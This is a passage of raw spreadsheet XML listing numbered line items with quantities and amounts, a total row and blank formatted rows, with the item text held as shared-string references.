      <c r="K501" s="99">
        <v>1600</v>
      </c>
      <c r="L501" s="9"/>
    </row>
    <row r="502" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A502" s="93"/>
      <c r="B502" s="11">
        <v>479</v>
      </c>
      <c r="C502" s="11"/>
      <c r="D502" s="9" t="s">
        <v>3868</v>
      </c>
      <c r="E502" s="9" t="s">
        <v>3878</v>
      </c>
      <c r="F502" s="9"/>
      <c r="G502" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H502" s="16">
        <v>1</v>
      </c>
      <c r="J502" s="131"/>
      <c r="K502" s="99">
        <v>2400</v>
      </c>
      <c r="L502" s="9"/>
    </row>
    <row r="503" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A503" s="93"/>
      <c r="B503" s="127" t="s">
        <v>3051</v>
      </c>
      <c r="C503" s="128"/>
      <c r="D503" s="129"/>
      <c r="E503" s="9"/>
      <c r="F503" s="9"/>
      <c r="G503" s="16"/>
      <c r="H503" s="16"/>
      <c r="J503" s="131"/>
      <c r="K503" s="99">
        <v>0</v>
      </c>
      <c r="L503" s="9"/>
    </row>
    <row r="504" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A504" s="93"/>
      <c r="B504" s="11">
        <v>480</v>
      </c>
      <c r="C504" s="11"/>
      <c r="D504" s="9" t="s">
        <v>3863</v>
      </c>
      <c r="E504" s="9" t="s">
        <v>3879</v>
      </c>
      <c r="F504" s="9"/>
      <c r="G504" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H504" s="16">
        <v>1</v>
      </c>
      <c r="J504" s="131"/>
      <c r="K504" s="99">
        <v>720</v>
      </c>
      <c r="L504" s="9"/>
    </row>
    <row r="505" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A505" s="93"/>
      <c r="B505" s="11">
        <v>481</v>
      </c>
      <c r="C505" s="11"/>
      <c r="D505" s="9" t="s">
        <v>842</v>
      </c>
      <c r="E505" s="9" t="s">
        <v>3880</v>
      </c>
      <c r="F505" s="9"/>
      <c r="G505" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H505" s="16">
        <v>1</v>
      </c>
      <c r="J505" s="9"/>
      <c r="K505" s="99">
        <v>1920</v>
      </c>
      <c r="L505" s="9"/>
    </row>
    <row r="506" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A506" s="93"/>
      <c r="B506" s="11">
        <v>482</v>
      </c>
      <c r="C506" s="11"/>
      <c r="D506" s="9" t="s">
        <v>3881</v>
      </c>
      <c r="E506" s="9" t="s">
        <v>3882</v>
      </c>
      <c r="F506" s="9"/>
      <c r="G506" s="16" t="s">
        <v>466</v>
      </c>
      <c r="H506" s="16">
        <v>1</v>
      </c>
      <c r="J506" s="9"/>
      <c r="K506" s="99">
        <v>14400</v>
      </c>
      <c r="L506" s="9"/>
    </row>
    <row r="507" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A507" s="93"/>
      <c r="B507" s="11">
        <v>483</v>
      </c>
      <c r="C507" s="11"/>
      <c r="D507" s="9" t="s">
        <v>3883</v>
      </c>
      <c r="E507" s="9" t="s">
        <v>3884</v>
      </c>
      <c r="F507" s="9"/>
      <c r="G507" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H507" s="16">
        <v>1</v>
      </c>
      <c r="J507" s="9"/>
      <c r="K507" s="99">
        <v>2400</v>
      </c>
      <c r="L507" s="9"/>
    </row>
    <row r="508" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A508" s="93"/>
      <c r="B508" s="11">
        <v>484</v>
      </c>
      <c r="C508" s="11"/>
      <c r="D508" s="9" t="s">
        <v>3865</v>
      </c>
      <c r="E508" s="9" t="s">
        <v>3885</v>
      </c>
      <c r="F508" s="9"/>
      <c r="G508" s="16" t="s">
        <v>466</v>
      </c>
      <c r="H508" s="16">
        <v>1</v>
      </c>
      <c r="J508" s="9"/>
      <c r="K508" s="99">
        <v>7200</v>
      </c>
      <c r="L508" s="9"/>
    </row>
    <row r="509" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A509" s="93"/>
      <c r="B509" s="11">
        <v>485</v>
      </c>
      <c r="C509" s="11"/>
      <c r="D509" s="9" t="s">
        <v>3886</v>
      </c>
      <c r="E509" s="9"/>
      <c r="F509" s="9"/>
      <c r="G509" s="16" t="s">
        <v>507</v>
      </c>
      <c r="H509" s="16">
        <v>1</v>
      </c>
      <c r="J509" s="9"/>
      <c r="K509" s="99">
        <v>1600</v>
      </c>
      <c r="L509" s="9"/>
    </row>
    <row r="510" customHeight="1" spans="1:12">
      <c r="A510" s="93"/>
      <c r="B510" s="11">
        <v>486</v>
      </c>
      <c r="C510" s="11"/>
      <c r="D510" s="9" t="s">
        <v>3887</v>
      </c>
      <c r="G510" s="16" t="s">
        <v>507</v>
      </c>
      <c r="H510" s="16">
        <v>1</v>
      </c>
      <c r="I510" s="88"/>
      <c r="K510" s="99">
        <v>1600</v>
      </c>
      <c r="L510" s="9"/>
    </row>
    <row r="511" customHeight="1" spans="1:12">
      <c r="A511" s="93"/>
      <c r="B511" s="11">
        <v>487</v>
      </c>
      <c r="C511" s="11"/>
      <c r="D511" s="9" t="s">
        <v>3888</v>
      </c>
      <c r="G511" s="16" t="s">
        <v>507</v>
      </c>
      <c r="H511" s="16">
        <v>2</v>
      </c>
      <c r="I511" s="88"/>
      <c r="K511" s="99">
        <v>3200</v>
      </c>
      <c r="L511" s="9"/>
    </row>
    <row r="512" customHeight="1" spans="1:12">
      <c r="A512" s="93"/>
      <c r="B512" s="11">
        <v>488</v>
      </c>
      <c r="C512" s="11"/>
      <c r="D512" s="9" t="s">
        <v>3889</v>
      </c>
      <c r="G512" s="16" t="s">
        <v>507</v>
      </c>
      <c r="H512" s="16">
        <v>1</v>
      </c>
      <c r="I512" s="88"/>
      <c r="K512" s="99">
        <v>1600</v>
      </c>
      <c r="L512" s="9"/>
    </row>
    <row r="513" customHeight="1" spans="1:12">
      <c r="A513" s="93"/>
      <c r="B513" s="11">
        <v>489</v>
      </c>
      <c r="C513" s="11"/>
      <c r="D513" s="9" t="s">
        <v>3890</v>
      </c>
      <c r="G513" s="16" t="s">
        <v>507</v>
      </c>
      <c r="H513" s="16">
        <v>1</v>
      </c>
      <c r="I513" s="88"/>
      <c r="K513" s="99">
        <v>1600</v>
      </c>
      <c r="L513" s="9"/>
    </row>
    <row r="514" customHeight="1" spans="1:12">
      <c r="A514" s="93"/>
      <c r="B514" s="11">
        <v>490</v>
      </c>
      <c r="C514" s="11"/>
      <c r="D514" s="10" t="s">
        <v>3891</v>
      </c>
      <c r="E514" s="10"/>
      <c r="G514" s="16" t="s">
        <v>507</v>
      </c>
      <c r="H514" s="16">
        <v>1</v>
      </c>
      <c r="I514" s="88"/>
      <c r="J514" s="130"/>
      <c r="K514" s="99">
        <v>1600</v>
      </c>
      <c r="L514" s="9" t="s">
        <v>3727</v>
      </c>
    </row>
    <row r="515" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A515" s="93"/>
      <c r="B515" s="11">
        <v>491</v>
      </c>
      <c r="C515" s="11"/>
      <c r="D515" s="10" t="s">
        <v>3889</v>
      </c>
      <c r="E515" s="9"/>
      <c r="F515" s="9"/>
      <c r="G515" s="16" t="s">
        <v>507</v>
      </c>
      <c r="H515" s="16">
        <v>1</v>
      </c>
      <c r="J515" s="131"/>
      <c r="K515" s="99">
        <v>1600</v>
      </c>
      <c r="L515" s="9" t="s">
        <v>3727</v>
      </c>
    </row>
    <row r="516" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A516" s="93"/>
      <c r="B516" s="11">
        <v>492</v>
      </c>
      <c r="C516" s="11"/>
      <c r="D516" s="10" t="s">
        <v>3892</v>
      </c>
      <c r="E516" s="9"/>
      <c r="F516" s="9"/>
      <c r="G516" s="16" t="s">
        <v>507</v>
      </c>
      <c r="H516" s="16">
        <v>1</v>
      </c>
      <c r="J516" s="131"/>
      <c r="K516" s="99">
        <v>1600</v>
      </c>
      <c r="L516" s="9" t="s">
        <v>3727</v>
      </c>
    </row>
    <row r="517" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A517" s="93"/>
      <c r="B517" s="11">
        <v>493</v>
      </c>
      <c r="C517" s="11"/>
      <c r="D517" s="9" t="s">
        <v>3893</v>
      </c>
      <c r="E517" s="9"/>
      <c r="F517" s="9"/>
      <c r="G517" s="16" t="s">
        <v>507</v>
      </c>
      <c r="H517" s="16">
        <v>1</v>
      </c>
      <c r="J517" s="131"/>
      <c r="K517" s="99">
        <v>1600</v>
      </c>
      <c r="L517" s="9" t="s">
        <v>3727</v>
      </c>
    </row>
    <row r="518" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A518" s="93"/>
      <c r="B518" s="11">
        <v>494</v>
      </c>
      <c r="C518" s="11"/>
      <c r="D518" s="9" t="s">
        <v>3894</v>
      </c>
      <c r="E518" s="9"/>
      <c r="F518" s="9"/>
      <c r="G518" s="16" t="s">
        <v>507</v>
      </c>
      <c r="H518" s="16">
        <v>1</v>
      </c>
      <c r="J518" s="131"/>
      <c r="K518" s="99">
        <v>1600</v>
      </c>
      <c r="L518" s="9" t="s">
        <v>3727</v>
      </c>
    </row>
    <row r="519" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A519" s="93"/>
      <c r="B519" s="11">
        <v>495</v>
      </c>
      <c r="C519" s="11"/>
      <c r="D519" s="9" t="s">
        <v>3854</v>
      </c>
      <c r="E519" s="9"/>
      <c r="F519" s="9"/>
      <c r="G519" s="16" t="s">
        <v>507</v>
      </c>
      <c r="H519" s="16">
        <v>1</v>
      </c>
      <c r="J519" s="9"/>
      <c r="K519" s="99">
        <v>1600</v>
      </c>
      <c r="L519" s="9" t="s">
        <v>3727</v>
      </c>
    </row>
    <row r="520" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A520" s="93"/>
      <c r="B520" s="11">
        <v>496</v>
      </c>
      <c r="C520" s="11"/>
      <c r="D520" s="9" t="s">
        <v>3895</v>
      </c>
      <c r="E520" s="9"/>
      <c r="F520" s="9"/>
      <c r="G520" s="16" t="s">
        <v>507</v>
      </c>
      <c r="H520" s="16">
        <v>1</v>
      </c>
      <c r="J520" s="9"/>
      <c r="K520" s="99">
        <v>1600</v>
      </c>
      <c r="L520" s="9"/>
    </row>
    <row r="521" customHeight="1" spans="1:12">
      <c r="A521" s="93"/>
      <c r="B521" s="11">
        <v>497</v>
      </c>
      <c r="C521" s="11"/>
      <c r="D521" s="9" t="s">
        <v>3896</v>
      </c>
      <c r="G521" s="16" t="s">
        <v>507</v>
      </c>
      <c r="H521" s="16">
        <v>1</v>
      </c>
      <c r="I521" s="88"/>
      <c r="K521" s="99">
        <v>1600</v>
      </c>
      <c r="L521" s="9"/>
    </row>
    <row r="522" customHeight="1" spans="1:12">
      <c r="A522" s="93"/>
      <c r="B522" s="11">
        <v>498</v>
      </c>
      <c r="C522" s="11"/>
      <c r="D522" s="10" t="s">
        <v>3890</v>
      </c>
      <c r="E522" s="132"/>
      <c r="G522" s="16" t="s">
        <v>507</v>
      </c>
      <c r="H522" s="16">
        <v>1</v>
      </c>
      <c r="I522" s="88"/>
      <c r="K522" s="99">
        <v>1600</v>
      </c>
      <c r="L522" s="9"/>
    </row>
    <row r="523" customHeight="1" spans="1:12">
      <c r="A523" s="93"/>
      <c r="B523" s="11">
        <v>499</v>
      </c>
      <c r="C523" s="11"/>
      <c r="D523" s="9" t="s">
        <v>3897</v>
      </c>
      <c r="G523" s="16" t="s">
        <v>3484</v>
      </c>
      <c r="H523" s="16">
        <v>3</v>
      </c>
      <c r="I523" s="88"/>
      <c r="K523" s="99">
        <v>4800</v>
      </c>
      <c r="L523" s="9"/>
    </row>
    <row r="524" customHeight="1" spans="1:12">
      <c r="A524" s="93"/>
      <c r="B524" s="11">
        <v>500</v>
      </c>
      <c r="C524" s="11"/>
      <c r="D524" s="9" t="s">
        <v>3854</v>
      </c>
      <c r="G524" s="16" t="s">
        <v>507</v>
      </c>
      <c r="H524" s="16">
        <v>2</v>
      </c>
      <c r="I524" s="88"/>
      <c r="K524" s="99">
        <v>3200</v>
      </c>
      <c r="L524" s="9"/>
    </row>
    <row r="525" customHeight="1" spans="1:12">
      <c r="A525" s="93"/>
      <c r="B525" s="11">
        <v>501</v>
      </c>
      <c r="C525" s="11"/>
      <c r="D525" s="9" t="s">
        <v>3898</v>
      </c>
      <c r="G525" s="16" t="s">
        <v>507</v>
      </c>
      <c r="H525" s="88">
        <v>1</v>
      </c>
      <c r="I525" s="88"/>
      <c r="J525" s="130"/>
      <c r="K525" s="99">
        <v>1600</v>
      </c>
      <c r="L525" s="9"/>
    </row>
    <row r="526" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A526" s="93"/>
      <c r="B526" s="11">
        <v>502</v>
      </c>
      <c r="C526" s="11"/>
      <c r="D526" s="9" t="s">
        <v>3899</v>
      </c>
      <c r="E526" s="9" t="s">
        <v>3900</v>
      </c>
      <c r="F526" s="9"/>
      <c r="G526" s="16" t="s">
        <v>507</v>
      </c>
      <c r="H526" s="16">
        <v>1</v>
      </c>
      <c r="J526" s="131"/>
      <c r="K526" s="99">
        <v>4800</v>
      </c>
      <c r="L526" s="9"/>
    </row>
    <row r="527" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A527" s="93"/>
      <c r="B527" s="11">
        <v>503</v>
      </c>
      <c r="C527" s="11"/>
      <c r="D527" s="9" t="s">
        <v>1296</v>
      </c>
      <c r="E527" s="9" t="s">
        <v>3763</v>
      </c>
      <c r="F527" s="9"/>
      <c r="G527" s="16" t="s">
        <v>507</v>
      </c>
      <c r="H527" s="16">
        <v>1</v>
      </c>
      <c r="J527" s="131"/>
      <c r="K527" s="99">
        <v>7200</v>
      </c>
      <c r="L527" s="9"/>
    </row>
    <row r="528" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A528" s="93"/>
      <c r="B528" s="11">
        <v>504</v>
      </c>
      <c r="C528" s="11"/>
      <c r="D528" s="9" t="s">
        <v>3807</v>
      </c>
      <c r="E528" s="9" t="s">
        <v>3901</v>
      </c>
      <c r="F528" s="9"/>
      <c r="G528" s="16" t="s">
        <v>507</v>
      </c>
      <c r="H528" s="16">
        <v>1</v>
      </c>
      <c r="J528" s="131"/>
      <c r="K528" s="99">
        <v>480</v>
      </c>
      <c r="L528" s="9"/>
    </row>
    <row r="529" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A529" s="93"/>
      <c r="B529" s="11">
        <v>505</v>
      </c>
      <c r="C529" s="11"/>
      <c r="D529" s="9" t="s">
        <v>3902</v>
      </c>
      <c r="E529" s="9" t="s">
        <v>3903</v>
      </c>
      <c r="F529" s="9"/>
      <c r="G529" s="16" t="s">
        <v>3904</v>
      </c>
      <c r="H529" s="16">
        <v>60</v>
      </c>
      <c r="J529" s="9"/>
      <c r="K529" s="99">
        <v>1600</v>
      </c>
      <c r="L529" s="9"/>
    </row>
    <row r="530" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A530" s="93"/>
      <c r="B530" s="11">
        <v>506</v>
      </c>
      <c r="C530" s="11"/>
      <c r="D530" s="9" t="s">
        <v>3905</v>
      </c>
      <c r="E530" s="9"/>
      <c r="F530" s="9"/>
      <c r="G530" s="16" t="s">
        <v>466</v>
      </c>
      <c r="H530" s="16">
        <v>1</v>
      </c>
      <c r="J530" s="9"/>
      <c r="K530" s="99">
        <v>1600</v>
      </c>
      <c r="L530" s="9"/>
    </row>
    <row r="531" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A531" s="93"/>
      <c r="B531" s="11">
        <v>507</v>
      </c>
      <c r="C531" s="11"/>
      <c r="D531" s="9" t="s">
        <v>3844</v>
      </c>
      <c r="E531" s="9"/>
      <c r="F531" s="9"/>
      <c r="G531" s="16" t="s">
        <v>466</v>
      </c>
      <c r="H531" s="16">
        <v>1</v>
      </c>
      <c r="J531" s="9"/>
      <c r="K531" s="99">
        <v>1600</v>
      </c>
      <c r="L531" s="9"/>
    </row>
    <row r="532" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A532" s="93"/>
      <c r="B532" s="11">
        <v>508</v>
      </c>
      <c r="C532" s="11"/>
      <c r="D532" s="9" t="s">
        <v>3906</v>
      </c>
      <c r="E532" s="9"/>
      <c r="F532" s="9"/>
      <c r="G532" s="16" t="s">
        <v>466</v>
      </c>
      <c r="H532" s="16">
        <v>1</v>
      </c>
      <c r="J532" s="9"/>
      <c r="K532" s="99">
        <v>1600</v>
      </c>
      <c r="L532" s="9"/>
    </row>
    <row r="533" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A533" s="93"/>
      <c r="B533" s="11">
        <v>509</v>
      </c>
      <c r="C533" s="11"/>
      <c r="D533" s="9" t="s">
        <v>3907</v>
      </c>
      <c r="E533" s="9"/>
      <c r="F533" s="9"/>
      <c r="G533" s="16" t="s">
        <v>507</v>
      </c>
      <c r="H533" s="16">
        <v>1</v>
      </c>
      <c r="J533" s="9"/>
      <c r="K533" s="99">
        <v>1600</v>
      </c>
      <c r="L533" s="9"/>
    </row>
    <row r="534" customHeight="1" spans="1:12">
      <c r="A534" s="93"/>
      <c r="B534" s="11">
        <v>510</v>
      </c>
      <c r="C534" s="11"/>
      <c r="D534" s="9" t="s">
        <v>3856</v>
      </c>
      <c r="G534" s="16" t="s">
        <v>3484</v>
      </c>
      <c r="H534" s="16">
        <v>11</v>
      </c>
      <c r="I534" s="88"/>
      <c r="K534" s="99">
        <v>17600</v>
      </c>
      <c r="L534" s="9"/>
    </row>
    <row r="535" customHeight="1" spans="1:12">
      <c r="A535" s="93"/>
      <c r="B535" s="11">
        <v>511</v>
      </c>
      <c r="C535" s="11"/>
      <c r="D535" s="9" t="s">
        <v>3908</v>
      </c>
      <c r="G535" s="16" t="s">
        <v>507</v>
      </c>
      <c r="H535" s="16">
        <v>1</v>
      </c>
      <c r="I535" s="88"/>
      <c r="K535" s="99">
        <v>8000</v>
      </c>
      <c r="L535" s="9"/>
    </row>
    <row r="536" customHeight="1" spans="1:12">
      <c r="A536" s="93"/>
      <c r="B536" s="11">
        <v>512</v>
      </c>
      <c r="C536" s="11"/>
      <c r="D536" s="9" t="s">
        <v>3854</v>
      </c>
      <c r="G536" s="16" t="s">
        <v>507</v>
      </c>
      <c r="H536" s="16">
        <v>1</v>
      </c>
      <c r="I536" s="88"/>
      <c r="K536" s="99">
        <v>1600</v>
      </c>
      <c r="L536" s="9"/>
    </row>
    <row r="537" customHeight="1" spans="1:12">
      <c r="A537" s="93"/>
      <c r="B537" s="11">
        <v>513</v>
      </c>
      <c r="C537" s="11"/>
      <c r="D537" s="9" t="s">
        <v>3909</v>
      </c>
      <c r="G537" s="16" t="s">
        <v>507</v>
      </c>
      <c r="H537" s="16">
        <v>1</v>
      </c>
      <c r="I537" s="88"/>
      <c r="K537" s="99">
        <v>240</v>
      </c>
      <c r="L537" s="9"/>
    </row>
    <row r="538" customHeight="1" spans="1:12">
      <c r="A538" s="93"/>
      <c r="B538" s="11">
        <v>514</v>
      </c>
      <c r="C538" s="11"/>
      <c r="D538" s="9" t="s">
        <v>3910</v>
      </c>
      <c r="G538" s="16" t="s">
        <v>507</v>
      </c>
      <c r="H538" s="88">
        <v>1</v>
      </c>
      <c r="I538" s="88"/>
      <c r="J538" s="130"/>
      <c r="K538" s="99">
        <v>1600</v>
      </c>
      <c r="L538" s="9"/>
    </row>
    <row r="539" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A539" s="93"/>
      <c r="B539" s="11">
        <v>515</v>
      </c>
      <c r="C539" s="11"/>
      <c r="D539" s="9" t="s">
        <v>3911</v>
      </c>
      <c r="E539" s="9"/>
      <c r="F539" s="9"/>
      <c r="G539" s="16" t="s">
        <v>507</v>
      </c>
      <c r="H539" s="16">
        <v>1</v>
      </c>
      <c r="J539" s="9"/>
      <c r="K539" s="99">
        <v>1600</v>
      </c>
      <c r="L539" s="9"/>
    </row>
    <row r="540" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A540" s="93"/>
      <c r="B540" s="11"/>
      <c r="C540" s="11"/>
      <c r="D540" s="9"/>
      <c r="E540" s="9"/>
      <c r="F540" s="9"/>
      <c r="G540" s="16"/>
      <c r="H540" s="16"/>
      <c r="I540" s="9"/>
      <c r="J540" s="9"/>
      <c r="K540" s="99">
        <v>0</v>
      </c>
      <c r="L540" s="9"/>
    </row>
    <row r="541" customHeight="1" spans="1:12">
      <c r="A541" s="93"/>
      <c r="B541" s="11"/>
      <c r="C541" s="11"/>
      <c r="H541" s="16"/>
      <c r="K541" s="99">
        <v>0</v>
      </c>
      <c r="L541" s="9"/>
    </row>
    <row r="542" customHeight="1" spans="1:12">
      <c r="A542" s="93"/>
      <c r="B542" s="11"/>
      <c r="C542" s="11"/>
      <c r="H542" s="16"/>
      <c r="K542" s="99">
        <v>0</v>
      </c>
      <c r="L542" s="9"/>
    </row>
    <row r="543" customHeight="1" spans="1:12">
      <c r="A543" s="93"/>
      <c r="B543" s="11"/>
      <c r="C543" s="11"/>
      <c r="D543" s="10"/>
      <c r="E543" s="10"/>
      <c r="G543" s="88"/>
      <c r="H543" s="88"/>
      <c r="I543" s="10"/>
      <c r="J543" s="130"/>
      <c r="K543" s="99">
        <v>0</v>
      </c>
      <c r="L543" s="9"/>
    </row>
    <row r="544" customHeight="1" spans="1:12">
      <c r="A544" s="93"/>
      <c r="B544" s="133" t="s">
        <v>1360</v>
      </c>
      <c r="C544" s="133"/>
      <c r="D544" s="134"/>
      <c r="E544" s="10"/>
      <c r="G544" s="88"/>
      <c r="H544" s="88">
        <v>804</v>
      </c>
      <c r="I544" s="10"/>
      <c r="J544" s="130">
        <v>141973939.28</v>
      </c>
      <c r="K544" s="99">
        <v>32389943.52</v>
      </c>
      <c r="L544" s="9"/>
    </row>
    <row r="545" customHeight="1" spans="1:12">
      <c r="A545" s="93"/>
      <c r="B545" s="93"/>
      <c r="C545" s="93"/>
      <c r="D545" s="135"/>
      <c r="E545" s="135"/>
      <c r="F545" s="135"/>
      <c r="G545" s="93"/>
      <c r="H545" s="107"/>
      <c r="I545" s="135"/>
      <c r="J545" s="135"/>
      <c r="K545" s="116"/>
      <c r="L545" s="135"/>
    </row>
    <row r="546" customHeight="1" spans="1:12">
      <c r="A546" s="93"/>
      <c r="B546" s="93"/>
      <c r="C546" s="93"/>
      <c r="D546" s="135"/>
      <c r="E546" s="135"/>
      <c r="F546" s="135"/>
      <c r="G546" s="93"/>
      <c r="H546" s="107"/>
      <c r="I546" s="135"/>
      <c r="J546" s="135"/>
      <c r="K546" s="116"/>
      <c r="L546" s="135"/>
    </row>
    <row r="547" customHeight="1" spans="1:12">
      <c r="A547" s="93"/>
      <c r="B547" s="93"/>
      <c r="C547" s="93"/>
      <c r="D547" s="135"/>
      <c r="E547" s="135"/>
      <c r="F547" s="135"/>
      <c r="G547" s="93"/>
      <c r="H547" s="107"/>
      <c r="I547" s="135"/>
      <c r="J547" s="135"/>
      <c r="K547" s="116"/>
      <c r="L547" s="135"/>
    </row>
    <row r="548" customHeight="1" spans="1:12">
      <c r="A548" s="93"/>
      <c r="B548" s="93"/>
      <c r="C548" s="93"/>
      <c r="D548" s="135"/>
      <c r="E548" s="135"/>
      <c r="F548" s="135"/>
      <c r="G548" s="93"/>
      <c r="H548" s="107"/>
      <c r="I548" s="135"/>
      <c r="J548" s="135"/>
      <c r="K548" s="116"/>
      <c r="L548" s="135"/>
    </row>
    <row r="549" customHeight="1" spans="1:12">
      <c r="A549" s="93"/>
      <c r="B549" s="93"/>
      <c r="C549" s="93"/>
      <c r="D549" s="135"/>
      <c r="E549" s="135"/>
      <c r="F549" s="135"/>
      <c r="G549" s="93"/>
      <c r="H549" s="107"/>
      <c r="I549" s="135"/>
      <c r="J549" s="135"/>
      <c r="K549" s="116"/>
      <c r="L549" s="138"/>
    </row>
    <row r="550" customHeight="1" spans="1:12">
      <c r="A550" s="93"/>
      <c r="B550" s="93"/>
      <c r="C550" s="93"/>
      <c r="D550" s="135"/>
      <c r="E550" s="135"/>
      <c r="F550" s="135"/>
      <c r="G550" s="93"/>
      <c r="H550" s="107"/>
      <c r="I550" s="135"/>
      <c r="J550" s="139"/>
      <c r="K550" s="116"/>
      <c r="L550" s="135"/>
    </row>
    <row r="551" customHeight="1" spans="1:12">
      <c r="A551" s="93"/>
      <c r="B551" s="93"/>
      <c r="C551" s="93"/>
      <c r="D551" s="135"/>
      <c r="E551" s="135"/>
      <c r="F551" s="135"/>
      <c r="G551" s="93"/>
      <c r="H551" s="107"/>
      <c r="I551" s="135"/>
      <c r="J551" s="135"/>
      <c r="K551" s="116"/>
      <c r="L551" s="135"/>
    </row>
    <row r="552" customHeight="1" spans="1:12">
      <c r="A552" s="93"/>
      <c r="B552" s="93"/>
      <c r="C552" s="93"/>
      <c r="D552" s="135"/>
      <c r="E552" s="135"/>
      <c r="F552" s="135"/>
      <c r="G552" s="93"/>
      <c r="H552" s="107"/>
      <c r="I552" s="135"/>
      <c r="J552" s="135"/>
      <c r="K552" s="116"/>
      <c r="L552" s="135"/>
    </row>
    <row r="553" customHeight="1" spans="1:12">
      <c r="A553" s="93"/>
      <c r="B553" s="93"/>
      <c r="C553" s="93"/>
      <c r="D553" s="135"/>
      <c r="E553" s="135"/>
      <c r="F553" s="135"/>
      <c r="G553" s="93"/>
      <c r="H553" s="107"/>
      <c r="I553" s="135"/>
      <c r="J553" s="135"/>
      <c r="K553" s="116"/>
      <c r="L553" s="138"/>
    </row>
    <row r="554" customHeight="1" spans="1:12">
      <c r="A554" s="93"/>
      <c r="B554" s="93"/>
      <c r="C554" s="93"/>
      <c r="D554" s="135"/>
      <c r="E554" s="135"/>
      <c r="F554" s="135"/>
      <c r="G554" s="93"/>
      <c r="H554" s="107"/>
      <c r="I554" s="135"/>
      <c r="J554" s="135"/>
      <c r="K554" s="116"/>
      <c r="L554" s="135"/>
    </row>
    <row r="555" customHeight="1" spans="1:12">
      <c r="A555" s="93"/>
      <c r="B555" s="93"/>
      <c r="C555" s="93"/>
      <c r="D555" s="135"/>
      <c r="E555" s="135"/>
      <c r="F555" s="135"/>
      <c r="G555" s="93"/>
      <c r="H555" s="107"/>
      <c r="I555" s="135"/>
      <c r="J555" s="135"/>
      <c r="K555" s="116"/>
      <c r="L555" s="135"/>
    </row>
    <row r="556" customHeight="1" spans="1:12">
      <c r="A556" s="93"/>
      <c r="B556" s="93"/>
      <c r="C556" s="93"/>
      <c r="D556" s="135"/>
      <c r="E556" s="135"/>
      <c r="F556" s="135"/>
      <c r="G556" s="93"/>
      <c r="H556" s="107"/>
      <c r="I556" s="135"/>
      <c r="J556" s="135"/>
      <c r="K556" s="116"/>
      <c r="L556" s="135"/>
    </row>
    <row r="557" customHeight="1" spans="1:12">
      <c r="A557" s="93"/>
      <c r="B557" s="93"/>
      <c r="C557" s="93"/>
      <c r="D557" s="135"/>
      <c r="E557" s="135"/>
      <c r="F557" s="135"/>
      <c r="G557" s="93"/>
      <c r="H557" s="107"/>
      <c r="I557" s="135"/>
      <c r="J557" s="135"/>
      <c r="K557" s="116"/>
      <c r="L557" s="135"/>
    </row>
    <row r="558" customHeight="1" spans="1:12">
      <c r="A558" s="93"/>
      <c r="B558" s="93"/>
      <c r="C558" s="93"/>
      <c r="D558" s="135"/>
      <c r="E558" s="135"/>
      <c r="F558" s="135"/>
      <c r="G558" s="93"/>
      <c r="H558" s="107"/>
      <c r="I558" s="135"/>
      <c r="J558" s="135"/>
      <c r="K558" s="116"/>
      <c r="L558" s="135"/>
    </row>
    <row r="559" customHeight="1" spans="1:12">
      <c r="A559" s="93"/>
      <c r="B559" s="93"/>
      <c r="C559" s="93"/>
      <c r="D559" s="135"/>
      <c r="E559" s="135"/>
      <c r="F559" s="135"/>
      <c r="G559" s="93"/>
      <c r="H559" s="107"/>
      <c r="I559" s="135"/>
      <c r="J559" s="135"/>
      <c r="K559" s="116"/>
      <c r="L559" s="135"/>
    </row>
    <row r="560" customHeight="1" spans="1:12">
      <c r="A560" s="93"/>
      <c r="B560" s="93"/>
      <c r="C560" s="93"/>
      <c r="D560" s="135"/>
      <c r="E560" s="135"/>
      <c r="F560" s="135"/>
      <c r="G560" s="93"/>
      <c r="H560" s="107"/>
      <c r="I560" s="135"/>
      <c r="J560" s="135"/>
      <c r="K560" s="116"/>
      <c r="L560" s="135"/>
    </row>
    <row r="561" customHeight="1" spans="1:12">
      <c r="A561" s="93"/>
      <c r="B561" s="108"/>
      <c r="C561" s="109"/>
      <c r="D561" s="136"/>
      <c r="E561" s="136"/>
      <c r="F561" s="135"/>
      <c r="G561" s="93"/>
      <c r="H561" s="107"/>
      <c r="I561" s="136"/>
      <c r="J561" s="140"/>
      <c r="K561" s="116"/>
      <c r="L561" s="135"/>
    </row>
    <row r="562" customHeight="1" spans="1:12">
      <c r="A562" s="93"/>
      <c r="B562" s="108"/>
      <c r="C562" s="109"/>
      <c r="D562" s="136"/>
      <c r="E562" s="136"/>
      <c r="F562" s="135"/>
      <c r="G562" s="93"/>
      <c r="H562" s="107"/>
      <c r="I562" s="136"/>
      <c r="J562" s="140"/>
      <c r="K562" s="116"/>
      <c r="L562" s="135"/>
    </row>
    <row r="563" customHeight="1" spans="1:12">
      <c r="A563" s="93"/>
      <c r="B563" s="108"/>
      <c r="C563" s="109"/>
      <c r="D563" s="136"/>
      <c r="E563" s="136"/>
      <c r="F563" s="135"/>
      <c r="G563" s="93"/>
      <c r="H563" s="107"/>
      <c r="I563" s="136"/>
      <c r="J563" s="140"/>
      <c r="K563" s="116"/>
      <c r="L563" s="135"/>
    </row>
